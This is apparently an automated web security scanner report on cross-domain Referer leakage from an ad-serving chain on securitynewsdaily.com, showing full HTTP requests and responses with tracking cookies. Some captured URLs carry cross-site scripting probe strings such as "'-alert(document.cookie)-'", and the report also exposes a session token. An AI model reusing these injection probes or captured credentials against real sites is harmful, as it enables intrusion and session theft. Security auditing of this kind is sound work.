When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


15.1. http://ad.doubleclick.net/adi/N1558.Media6/B3897970.8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1558.Media6/B3897970.8

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1558.Media6/B3897970.8;sz=728x90;click0=http://ad.media6degrees.com/adserv/clk?tId=12497909247337382|cId=3211|cb=1297710111|notifyPort=8080|exId=20|tId=12497909247337382|ec=1|secId=57|price=TVl8HgAMoucK5Wgls29b3PX_MoiUTYw1PBJRMA|pubId=56|advId=971|notifyServer=asd146.sd.pl.pvt|spId=27355|adType=iframe|invId=135|bid=1.61|ctrack=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB9leAHnxZTefFMqXQlQfct72bC_-unYMCx9fN2ief_6ONYAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xODk0NTc4OTUwNTMyNTA0oAGLgMjrA7IBGXd3dy5zZWN1cml0eW5ld3NkYWlseS5jb226AQk3Mjh4OTBfYXPIAQnaAVFodHRwOi8vd3d3LnNlY3VyaXR5bmV3c2RhaWx5LmNvbS90b29sczM0N2FjJy1hbGVydChkb2N1bWVudC5jb29raWUpLSc5ZjlhMmUzNjk3NC-YAp4KwAIFyALR0c8MqAMB6AOdCegD4gXoA7sC6AO6AvUDAAAAxPUDEAAAAA%26num%3D1%26sig%3DAGiWqtzWDWiQGS9YdY2V3Kkt29cplZ3pbA%26client%3Dca-pub-1894578950532504%26adurl%3D;ord=1297710112102? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=12497909247337382|cb=1297710111|adType=iframe|cId=3211|ec=1|spId=27355|advId=971|exId=20|price=TVl8HgAMoucK5Wgls29b3PX_MoiUTYw1PBJRMA|pubId=56|secId=57|invId=135|notifyServer=asd146.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=|ctrack=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB9leAHnxZTefFMqXQlQfct72bC_-unYMCx9fN2ief_6ONYAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xODk0NTc4OTUwNTMyNTA0oAGLgMjrA7IBGXd3dy5zZWN1cml0eW5ld3NkYWlseS5jb226AQk3Mjh4OTBfYXPIAQnaAVFodHRwOi8vd3d3LnNlY3VyaXR5bmV3c2RhaWx5LmNvbS90b29sczM0N2FjJy1hbGVydChkb2N1bWVudC5jb29raWUpLSc5ZjlhMmUzNjk3NC-YAp4KwAIFyALR0c8MqAMB6AOdCegD4gXoA7sC6AO6AvUDAAAAxPUDEAAAAA%26num%3D1%26sig%3DAGiWqtzWDWiQGS9YdY2V3Kkt29cplZ3pbA%26client%3Dca-pub-1894578950532504%26adurl%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8681
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 19:01:52 GMT
Expires: Mon, 14 Feb 2011 19:01:52 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Apr 29 18:34:20 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
4gXoA7sC6AO6AvUDAAAAxPUDEAAAAA%26num%3D1%26sig%3DAGiWqtzWDWiQGS9YdY2V3Kkt29cplZ3pbA%26client%3Dca-pub-1894578950532504%26adurl%3Dhttp://www.travelguard.com/mytravelguard?cmpid=bac-001-mytg0410-iphone"><img src="http://s0.2mdn.net/1774243/TGC_MyTravelGuard_iPhone_728x90_Light_4.29.gif" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

15.2. http://ad.media6degrees.com/adserv/cs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adserv/cs?tId=12497909247337382|cb=1297710111|adType=iframe|cId=3211|ec=1|spId=27355|advId=971|exId=20|price=TVl8HgAMoucK5Wgls29b3PX_MoiUTYw1PBJRMA|pubId=56|secId=57|invId=135|notifyServer=asd146.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=|ctrack=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB9leAHnxZTefFMqXQlQfct72bC_-unYMCx9fN2ief_6ONYAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xODk0NTc4OTUwNTMyNTA0oAGLgMjrA7IBGXd3dy5zZWN1cml0eW5ld3NkYWlseS5jb226AQk3Mjh4OTBfYXPIAQnaAVFodHRwOi8vd3d3LnNlY3VyaXR5bmV3c2RhaWx5LmNvbS90b29sczM0N2FjJy1hbGVydChkb2N1bWVudC5jb29raWUpLSc5ZjlhMmUzNjk3NC-YAp4KwAIFyALR0c8MqAMB6AOdCegD4gXoA7sC6AO6AvUDAAAAxPUDEAAAAA%26num%3D1%26sig%3DAGiWqtzWDWiQGS9YdY2V3Kkt29cplZ3pbA%26client%3Dca-pub-1894578950532504%26adurl%3D HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1894578950532504&output=html&h=90&slotname=3983344906&w=728&channel=9120656992_3996339198&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.securitynewsdaily.com%2Ftools347ac'-alert(document.cookie)-'9f9a2e36974%2F&dt=1297710127289&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297710127294&frm=1&adk=2785858344&ga_vid=2067892625.1297710127&ga_sid=1297710127&ga_hid=1065518577&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1097&bih=1010&ifk=3932329480&fu=4&ifi=1&dtd=8
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt12707lxzt12aob2xzt12707lxzt12707l; adh="1lf17qo16053t2a012fr01PosQJERns01jx8p3w0t012e301OdygJLiOt01jvcj3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; clid=2lebnns011706ch47d7o8wtv2aocm02219020805219; orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; rdrlst=43511gvlggtq20000000g19020ojdlggtq20000000g19020yujlginvd0000000d19020x1blebnns1wj3q01411000e0flggrmr0000000h19020jv3lginvd0000000d19020yielginvd0000000d19020yiflginvd0000000d19020oj6lggtq20000000g19020e08lggtq20000000g190210qflginvq0000000c19020w3clebnns1wj3q01411000e0nlgevbm0000000j19020jv6lebnns1wj3q01411000jv5lggtq20000000g19020j4ilew2e20000001w19020khalggtq20000000g19021196lfzx0l0000001919021195lg7rdq0000001019020jillebnns1wj3q01411001194lg3y5y0000001619020z14lggtq20000000g19020zgdlggtq20000000g19020faalggtq20000000g19020z13lgio080000000719021193lgiiin0000000e19021192lg5l2h0000001519020jprlginvd0000000d19020w2klggtq20000000g19020yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001y19020mmnlebnns1wj3q01411000xwhlggtq20000000g19021004lginvd0000000d19020z02lggtq20000000g19020kbzlggtq20000000g19020kkclggtq20000000g19020eh5lf17qf0000001u19020z01lgmbyu00000002190206bylemlne0000002019020df5lgcqt50000000o1902111xlggtq20000000g19020mn2lginvd0000000d19020mn1lginvd0000000d19020swvlggtq20000000g1902100plggtq20000000g19020im3lgcqt50000000o19020yzflgmc0e0000000119010yzglginxj0000000a19020b6mlf17qk0000001t19020y63lg93og0000000t19020xvslebnns1wj3q01411000o5alggtq20000000g19020yyxlginvu0000000b19020yywlginzk0000000819020x1jlebnns1wj3q01411000xwclginvd0000000d19020o4plginvd0000000d19020yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000g19020yyelginyj0000000919020fullf8gij0000001q190210f6lg1nei00000018190200c9lfk1rn0000001n19020y7blg94wv0000000r19020jsalggtq20000000g190206pklginvd0000000d19020cajlfk1rn0000001n19020p7vlebnns1xgc001b120010tylg60ji00000011190210ellg1nei07gla00h120010eklggtq20000000g19020xuklebnns22191022190211k3lginvd0000000d190210telg60j600000013190210e9lg1nei0000001819020xtblggtq20000000g190210e2lggtq20000000g19020mivlgismk0000000619020yw4lggtq20000000g190210e4lginvd0000000d190210e5lg1nei0jfph015180010rdlg1vir087mk01719020xt3lggtq20000000g19020mzklgcsh70000000m19020agalggtq20000000g19020agblggtq20000000g19020mzqlgcsgy0000000n19020loxlginvd0000000d190207gmlebnns1wj3q01411000kfalginvd0000000d19020xthlebnns1xgc001b12000xtflggtq20000000g19020za2lginvd0000000d19020za1lginvd0000000d19020ovwlginvd0000000d190207gqlggtq20000000g19020lw4lginvd0000000d19020fuqlegh2b0000002119020lw3lggtq20000000g19020mz1lebnns1wj3q01411000l24lginvd0000000d19020l25lggtq20000000g190207vglfk1rn0tn5601n19020jk7lebnns1wj3q01411000cbnlfk1rn0tn5601n19020e11lggwth0000000f1902; sglst=21m0s8dtlggrmr01w8m00h1902080520h8kmlggrmr01w8m00h1902080520havtlggrmr0056q00h1902080520h82hlebnns1ucve00z10000600200avjlggrmr01w8m00h1902080520h3kilggrmr01w8m00h1902080520halhlggrmr01w8m00h1902080520h9bslggrmr01w8m00h1902080520hab4lebnns2707l0221902080521981zlggrmr0056q00h1902080520h8gxlggrmr0056q00h1902080520h81ylginvd0000000d1902080520d8gwlginvd0000000d1902080520daoklggrmr0056q00h1902080520haollginvd0000000d1902080520db07lggwth01r1w00f1902080520f8nclginvd0000000d1902080520d7inlginvd0000000d1902080520db05lggrmr01w8m00h1902080520hal1lggrmr01w8m00h1902080520h8wylginvd0000000d1902080520dbbhlggrmr01w8m00h1902080520h8wxlggrmr0056q00h1902080520hb0clfjpei0yygv01o1902080521972slggtq205iac00g1902080520gahhlginvd0000000d1902080520d8nblggrmr0056q00h1902080520hahilggrmr0056q00h1902080520h7gdlgcqt509l7900o1902080520ob08lfjpei0yygv01b1700070020040ulggrmr01w8m00h1902080520haprlggrmr01w8m00h1902080520h5l4lgcqt509l7900o1902080520oaanlebnns1xg0o00o120007002008aelggrmr0056q00h1902080520h474lgl4zd000000031902080320361hlggrmr01w8m00h1902080520h5b0lf17qo0000001s19020805219ag2leqh191vuz501z190208052193thlggrmr01w8m00h1902080520h8c9lggrmr0056q00h1902080520h9z4lggrmr01w8m00h1902080520hacjlggrmr01w8m00h1902080520hb1alfjpei0yygv01o190208052199mmlggrmr0056q00h1902080520hb0nlggrmr01w8m00h1902080520hb0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00h1902080520h4zqlgl33700000005190208052059cblggrmr0056q00h1902080520h0tllegh2b25uy3021190208052195q8lebnns1ucve00k100006002004wmlggrmr01w8m00h1902080520h8bglginvd0000000d1902080520dacelggrmr01w8m00h1902080520h45mlfdxmc0000001p19020805219bhdlginvd0000000d1902080520d; vstcnt=3lebnns051l064e206123s185k81848g1848f1848e1848d1848c1848b1848a18488184871848618485184841848218481184801847z1847y1847x1847v1847u1847t1847s1847r1847q1847p1847o1847k1847i1847h1847g1847f1847e1847d1847c1847b1847a18479184781847418472184711846v1846u1846t1846s1846r1846q1846p1846o1846l1846k1846j1846i1846b1846a18469184621845y1845x1845w1845v1845t1845s1845r1845q1845p1845o1845n1845m1845k1845j1845i1845h1845g1845f1845e1845d1845c1845b1845a1845818457184561845518454184531844z1844y1844w1844v1844u1844t1844s1844r1844q1844p1844n1844m1844l1844k1844j1844h1844g1844f1844e1844d1844c1844a1843w1843v1843u1843t1843s1843r1843p1843o1843n1843m1843k1843j1843h1843g1843f1843d1843c184371843518434184301842z1842y1842x1842u1842t181qq4lhh512012aob24qbzj120a1yfnu1yfnt1yfnq1yfnp1yfno1yfnn1yfnm1yfnl1yfi41yfhj4e2p3120t237p8237p7237p6237p4237ou237os237oq237op237oo237on237om237ol237oi237oh237og237of237oe237oc237ob237o6237o5237o4237o3237o2237o1237o0237ny237nv237nu4fhux122j0d1tf0d1te0d1tc0d1tb0d1ta0d1t90d1t80d1t70d1t50d1t40d1t30d1t20d1t00d1sz0d1su0d1st0d1ss0d1sr0d1sq0d1so0d1sn0d1sm0d1sk0d1sj0d1si0d1se0d1sd0d1sc0d1s70d1s40d1s20d1s10d1s00d1rw0d1ru0d1rt0d1rs0d1rr0d1rq0d1rp0d1ro0d1rm0d1rl0d1rk0d1rj0d1rh0d1rg0d1rf0d1rd0d1rc0d1rb0d1r90d1r80d1r70d1r60d1r40d1r30d1r20d1r10d1r00d1qz0d1qx0d1qw0d1qv0d1qu0d1qo0d1qm0d1ql0d1qj0d1qi0d1qh0d1qg0d1qe0d1qc0d1qb0d1qa0d1q60d1q50d1q40d1q20d1q10d1py0d1px0d1pw0d1pv0d1pu0d1ps0d1pr0d1pq0d1pm0d1pl49wpz120r1w3r41w3r01w3qz1w3qy1w3qx1w3qv1w3qu1w3qr1w3qq1w3qo1w3qm1w3ql1w3qi1w3qh1w3qg1w3qf1w3qe1w3qb1w3qa1w3q91w3q81w3q71w3q61w3q41w3q31w3pz1w3py0r083ik5120o0pk2n0kh4b0kh4a0kh490kh430kh3z0kh3y0kh3x0kh3v0kh3u0kh3t0kh3s0kh3r0kh3p0kh3m0kh3l0kh3j0kh3h0kh3g0kh3f0kh3d0kh3a0kh390keqa4nssk122m1c4wn1bw5j1bw5i1bw5g1bw5f1bw5e1bw5d1bw5b1bw5a1bw591bw561bw551bw541bw531bw521bw511bw501bw4z1bw4y1bw4x1bw4w1bw4u1bw4t1bw4s1bw4r1bw4q1bw4p1bw4o1bw4n1bw4l1bw4j1bw4i1bw4h1bw4g1bw4f1bw4e1bw4c1bw4b1bw4a1bw491bw481bw471bw461bw451bw441bw431bw421bw401bw3z1bw3x1bw3w1bw3v1bw3u1bw3t1bw3s1bw3r1bw3q1bw3p1bw3n1bw3m1bw3l1bw3k1bw3f1bw3e1bw3c1bw3b1bw3a1bw381bw361bw351bw341bw331bw321bw311bw301bw2z1bw2w1bw2v1bw2u1bw2t1bw2s1bw2r1bw2q1bw2p1bw2o1bw2n1bw2m1bw2l1bw2k1bw2j1bw2i1bw2c1bw2b1boph4l2ch12012aocm4u0e31202259612595p32te12021xgde1xg0o38c912012707l4jaec12021udrn1ucve3sti120326v3926uvg26uuv0s018raevpblc12011xh931p028VgwGdHhN1101254098BreszClF110v254102540z2540y2540x2540w2540u2540t2540s2540r2540q2540p2540n2540m2540l2540h2540g2540f2540d2540c2540b2540a254062540525404254032540225401253zz253zy253zx253yz1o018EstvP2qn112s1oa941oa931oa921oa911oa8z1oa8v1oa8u1oa8t1oa8s1oa8q1oa8p1oa8o1oa8n1oa8m1oa8l1oa8j1oa8i1oa8h1oa8g1oa8f1oa8e1oa8d1oa8c1oa8b1oa891oa881oa871oa841oa831oa821oa811oa801oa7y1oa7x1oa7w1oa7v1oa7u1oa7t1oa7s1oa7o1oa7n1oa7l1oa7k1oa7j1oa7i1oa7h1oa7g1oa7f1oa7e1oa7d1oa7b1oa7a1oa791oa781oa771oa761oa751oa741oa731oa721oa701oa6z1oa6y1oa6x1oa6w1oa6v1oa6u1oa6t1oa6o1oa6n1oa6m1oa6l1oa6k1oa6j1oa6h1oa6g1oa6f1oa6e1oa691oa681oa651oa641oa631oa611oa601oa5z1oa5y1oa5w1oa5v1oa5t1oa5s1oa5r1oa5q1oa5m1oa5l1oa5k1oa5j1oa5i1oa5h1o9ct

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16063w0s0103r01sZshBH2Om01l7sg3t2a012fr01PosQJERns01jx8p3w0t012e301OdygJLiOt01jvcj3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv2arvc0231903080621a; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:52 GMT; Path=/
Set-Cookie: orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:52 GMT; Path=/
Set-Cookie: rdrlst=4350ojdlggtq20000000h190311gvlggtq20000000h19030yujlginvd0000000e19030jv3lginvd0000000e19030e0flggrmr0000000i19030x1blebnns1wj3q01411000yielginvd0000000e19030yiflginvd0000000e19030oj6lggtq20000000h19030e08lggtq20000000h190310qflginvq0000000d19030e0nlgevbm0000000k19030w3clebnns1wj3q01411000jv6lebnns1wj3q01411000jv5lggtq20000000h19030j4ilew2e20000001x19030khalggtq20000000h19031196lfzx0l0000001a19031195lg7rdq0000001119030jillebnns1wj3q01411001194lg3y5y0000001719030z14lggtq20000000h19030zgdlggtq20000000h19030faalggtq20000000h19030z13lgio080000000819031193lgiiin0000000f19031192lg5l2h0000001619030jprlginvd0000000e19030w2klggtq20000000h19030yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001z19030mmnlebnns1wj3q01411000xwhlggtq20000000h19031004lginvd0000000e19030z02lggtq20000000h19030kbzlggtq20000000h19030z01lgmbyu0000000319030eh5lf17qf0000001v19030kkclggtq20000000h190306bylemlne0000002119030df5lgcqt50000000p1903111xlggtq20000000h19030mn2lginvd0000000e19030mn1lginvd0000000e19030swvlggtq20000000h1903100plggtq20000000h19030im3lgcqt50000000p19030yzflgmc0e0000000219020yzglginxj0000000b19030b6mlf17qk0000001u19030y63lg93og0000000u19030xvslebnns1wj3q01411000o5alggtq20000000h19030yyxlginvu0000000c19030yywlginzk0000000919030x1jlebnns1wj3q01411000xwclginvd0000000e19030o4plginvd0000000e19030yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000h19030yyelginyj0000000a19030fullf8gij0000001r190310f6lg1nei00000019190300c9lfk1rn0000001o19030y7blg94wv0000000s19030jsalggtq20000000h190306pklginvd0000000e19030cajlfk1rn0000001o19030p7vlebnns1xgc001b120010tylg60ji00000012190310ellg1nei07gla00h120010eklggtq20000000h19030xuklebnns22191023190311k3lginvd0000000e190310telg60j600000014190310e9lg1nei0000001919030xtblggtq20000000h190310e2lggtq20000000h19030mivlgismk0000000719030yw4lggtq20000000h190310e4lginvd0000000e190310e5lg1nei0jfph015180010rdlg1vir087mk01819030xt3lggtq20000000h19030mzklgcsh70000000n19030agalggtq20000000h19030agblggtq20000000h19030mzqlgcsgy0000000o19030loxlginvd0000000e190307gmlebnns1wj3q01411000kfalginvd0000000e19030xthlebnns1xgc001b12000xtflggtq20000000h19030za2lginvd0000000e19030za1lginvd0000000e190307gqlggtq20000000h19030ovwlginvd0000000e19030lw4lginvd0000000e19030fuqlegh2b0000002219030lw3lggtq20000000h19030l24lginvd0000000e19030mz1lebnns1wj3q01411000l25lggtq20000000h190307vglfk1rn0tn5601o19030jk7lebnns1wj3q01411000cbnlfk1rn0tn5601o19030e11lggwth0000000g1903; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:52 GMT; Path=/
Set-Cookie: sglst=21m0s8dtlggrmr01w8m00i1903080620i8kmlggrmr01w8m00i1903080620iavtlggrmr0056q00i1903080620i82hlebnns1ucve00z10000600200avjlggrmr01w8m00i1903080620i3kilggrmr01w8m00i1903080620ialhlggrmr01w8m00i1903080620i9bslggrmr01w8m00i1903080620iab4lebnns2707l0231903080621a81zlggrmr0056q00i1903080620i8gxlggrmr0056q00i1903080620i81ylginvd0000000e1903080620e8gwlginvd0000000e1903080620eaoklggrmr0056q00i1903080620iaollginvd0000000e1903080620eb07lggwth01r1w00g1903080620g7inlginvd0000000e1903080620e8nclginvd0000000e1903080620eb05lggrmr01w8m00i1903080620ial1lggrmr01w8m00i1903080620ibbhlggrmr01w8m00i1903080620i8wylginvd0000000e1903080620eb0clfjpei0yygv01p1903080621a8wxlggrmr0056q00i1903080620i72slggtq205lt200h1903080620hahhlginvd0000000e1903080620e8nblggrmr0056q00i1903080620iahilggrmr0056q00i1903080620i7gdlgcqt509opz00p1903080620pb08lfjpei0yygv01b1700070020040ulggrmr01w8m00i1903080620iaprlggrmr01w8m00i1903080620i5l4lgcqt509opz00p1903080620paanlebnns1xg0o00o120007002008aelggrmr0056q00i1903080620i474lgl4zd000000041903080420461hlggrmr01w8m00i1903080620i5b0lf17qo0000001t1903080621aag2leqh191vyhv0201903080621a3thlggrmr01w8m00i1903080620i8c9lggrmr0056q00i1903080620i9z4lggrmr01w8m00i1903080620iacjlggrmr01w8m00i1903080620ib1alfjpei0yygv01p1903080621a9mmlggrmr0056q00i1903080620ib0nlggrmr01w8m00i1903080620ib0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00i1903080620i4zqlgl33701cfx006190308062060tllegh2b25ygt0221903080621a9cblggrmr0056q00i1903080620i8bglginvd0000000e1903080620e4wmlggrmr01w8m00i1903080620i5q8lebnns1ucve00k10000600200acelggrmr01w8m00i1903080620i45mlfdxmc0000001q1903080621abhdlginvd0000000e1903080620e; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:52 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 14 Feb 2011 19:01:52 GMT
Content-Length: 1037

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Media6/B3897970.8;sz=728x90;click0=http://ad.media6degrees.com/adserv/clk?tId=12497909247337382|cId=3211|cb=1297710111|notifyPort=8080|exId=20|tId=12497909247337382|ec=1|secId=57|price=TVl8HgAMoucK5Wgls29b3PX_MoiUTYw1PBJRMA|pubId=56|advId=971|notifyServer=asd146.sd.pl.pvt|spId=27355|adType=iframe|invId=135|bid=1.61|ctrack=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB9leAHnxZTefFMqXQlQfct72bC_-unYMCx9fN2ief_6ONYAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xODk0NTc4OTUwNTMyNTA0oAGLgMjrA7IBGXd3dy5zZWN1cml0eW5ld3NkYWlseS5jb226AQk3Mjh4OTBfYXPIAQnaAVFodHRwOi8vd3d3LnNlY3VyaXR5bmV3c2RhaWx5LmNvbS90b29sczM0N2FjJy1hbGVydChkb2N1bWVudC5jb29raWUpLSc5ZjlhMmUzNjk3NC-YAp4KwAIFyALR0c8MqAMB6AOdCegD4gXoA7sC6AO6AvUDAAAAxPUDEAAAAA%26num%3D1%26sig%3DAGiWqtzWDWiQGS9YdY2V3Kkt29cplZ3pbA%26client%3Dca-pub-1894578950532504%26adurl%3D;ord=1297710112178?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0

MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
</IFRAME>
...[SNIP]...

15.3. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1894578950532504&output=html&h=90&slotname=3983344906&w=728&channel=9120656992_3996339198&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.securitynewsdaily.com%2F6efdb'-alert(1)-'cf92265efad&dt=1297709919578&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297709919578&frm=1&adk=2785858344&ga_vid=1721385893.1297709920&ga_sid=1297709920&ga_hid=1335491175&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1097&bih=1010&ifk=1769145327&fu=4&ifi=1&dtd=15 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/index.php?option=com_ads&format=raw&w=728&ad=106&ord=661057325778529000&zone=home_page&kw=internet%20security%20news%2Chome%20security%2Ccybercrimes%2Cnetwork%20threats%2Cidentity%20theft%2Cinternet%20scams%2Ccomputer%20virus%20removal%2Csocial%20networks&sz=&token=a8a1f94d0e0aebfbc90d6bf95954acabbe45a2b7
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 18:58:24 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4177

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.securitynewsdaily.com/6efdb%2527-alert(1)-%2527cf92265efad%26hl%3Den%26client%3Dca-pub-1894578950532504%26adU%3Dwww.sonitrol.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEQht2o2ENuHZVNADh6IESUwEs8AQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

15.4. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

